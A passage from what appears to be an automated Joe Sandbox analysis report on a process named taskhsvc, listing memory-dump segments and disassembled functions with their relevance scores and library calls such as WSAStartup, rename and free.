    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003F6A70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855588250.003F6000.00000080.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002F1A65, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78
    APIs
      • Part of subcall function 002F116D: __stack_chk_fail.LIBSSP-0 ref: 002F11D4
    • abort.MSVCRT ref: 002F1B59
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 003215E4
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 00321623
      • Part of subcall function 0032158B: memcpy.MSVCRT ref: 0032164A
      • Part of subcall function 0032158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 0032165D
      • Part of subcall function 002F11DB: __stack_chk_fail.LIBSSP-0 ref: 002F128B
      • Part of subcall function 002F0D90: __stack_chk_fail.LIBSSP-0 ref: 002F0E87
    • __stack_chk_fail.LIBSSP-0 ref: 002F1B7C
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00223C99, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 00223D3D
      • Part of subcall function 003286E9: strlen.MSVCRT ref: 00328739
      • Part of subcall function 003286E9: __stack_chk_fail.LIBSSP-0 ref: 00328789
      • Part of subcall function 00317D3D: free.MSVCRT ref: 00317D98
      • Part of subcall function 00317D3D: __stack_chk_fail.LIBSSP-0 ref: 00317DAB
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00223D25
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00287868, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
    APIs
    • abort.MSVCRT ref: 002878D8
      • Part of subcall function 002875C0: time.MSVCRT ref: 002875F0
      • Part of subcall function 002875C0: abort.MSVCRT ref: 00287690
      • Part of subcall function 002875C0: abort.MSVCRT ref: 002876E2
      • Part of subcall function 002875C0: event_add.LIBEVENT-2-0-5 ref: 00287713
      • Part of subcall function 002875C0: __stack_chk_fail.LIBSSP-0 ref: 00287724
    • __stack_chk_fail.LIBSSP-0 ref: 00287904
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00315AA7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
    APIs
    • rename.MSVCRT ref: 00315B14
    • __stack_chk_fail.LIBSSP-0 ref: 00315B24
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00319204, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
    APIs
    • WSAStartup.WS2_32 ref: 0031922D
    • __stack_chk_fail.LIBSSP-0 ref: 00319286
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002BFFD6, Relevance: 4.7, APIs: 3, Instructions: 245
    APIs
    • strerror.MSVCRT ref: 002C005A
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 002BEE07: __stack_chk_fail.LIBSSP-0 ref: 002BEE6E
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C166E
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1698
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C16DA
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1731
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C178E
      • Part of subcall function 002C13B7: __stack_chk_fail.LIBSSP-0 ref: 002C17A8
      • Part of subcall function 002BEE75: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C01E2), ref: 002BEF25
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    • strerror.MSVCRT ref: 002C026C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00319BE8: memset.MSVCRT ref: 00319C1F
      • Part of subcall function 00319BE8: __stack_chk_fail.LIBSSP-0 ref: 00319C3A
      • Part of subcall function 002B3EC7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002B66C7), ref: 002B3EFF
      • Part of subcall function 002339FC: __stack_chk_fail.LIBSSP-0 ref: 00233AAE
    • __stack_chk_fail.LIBSSP-0 ref: 002C0321
      • Part of subcall function 00237466: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002C0313), ref: 00237491
      • Part of subcall function 00326573: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C0EBF), ref: 003265A7
      • Part of subcall function 002BF7B1: strlen.MSVCRT ref: 002BF845
      • Part of subcall function 002BF7B1: strerror.MSVCRT ref: 002BF878
      • Part of subcall function 002BF7B1: strlen.MSVCRT ref: 002BF8B5
      • Part of subcall function 002BF7B1: strerror.MSVCRT ref: 002BF93C
      • Part of subcall function 002BF7B1: __stack_chk_fail.LIBSSP-0 ref: 002BF99F
      • Part of subcall function 003265AE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,003266E8), ref: 003265E2
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325D72
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DB1
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DF6
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325ECF
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325F30
      • Part of subcall function 00325CFA: _close.MSVCRT ref: 00325F8C
